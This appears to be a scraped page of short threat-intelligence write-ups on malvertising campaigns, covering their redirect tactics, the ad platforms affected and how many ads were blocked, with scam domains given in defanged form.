This malicious campaign has two methods of triggering the redirect. They attempt to load a script by writing a script call to a jquery file from and then run a function to replace all parts of the url to build the malicious payload and sends along fingerprinting information (screen w/h, platform, UA, color depth, number of plugins, timestamp, etc).  It additionally loads a hidden iframe with a source that executes javascript that attempts to do a top.location.replace.  

The ad that is loaded along with this malicious payload is a simple image (either a logo, or a stolen Amazon Fire TV Stick ad) that actually takes a user to an Amazon listing for a firetv stick.

There seem to be two different campaigns active at the moment - one leading to healthnotetoday(dot)com and the other leading to various giftcard scam pages. 

Affected Platforms:  GumGum (buyer has been blocked) & Between Digital

Assessment:  Fraudsters hosting obfuscated scripts on AWS & Yahoo platforms, attempted to deliver malicious redirects to over 300 different domains.  To date, over 600M bad ads have been stopped and remonetized, primarily on mobile devices.   

Affected Platforms:  inMobi

Assessment:  Redirect campaign spanning almost 1,500 sites over the past 7-days.  Creative automatically drove mobile and desktop users to sites like inboxfunpoints[dot]com, 7daynews[dot]com, foxnewstoday[dot]com.  ADL protected over 4.5M ads during the attack.

Affected platforms:  Yieldmo, ReklamStore DSP


Read More

Assessment:  Nefarious campaign impacting  25+ different domains.  An unwanted script injected via malicious browser extension used to hijack regular ad slots to load an Adskeeper unit.  The Adskeeper unit then displays graphic "adult" content across the site.

Affected Platforms:  Adskeeper

Assessment:  Redirect campaign targeting both mobile and desktop users with fake update messages.  Redirects have been identified and blocked across 120 domains and almost 20 different publishers.  The primary redirection tactic utilized WebSockets while other scripts proactively looked for the presence of ad quality software. 

Affected Platforms:  EMX

`` `` ``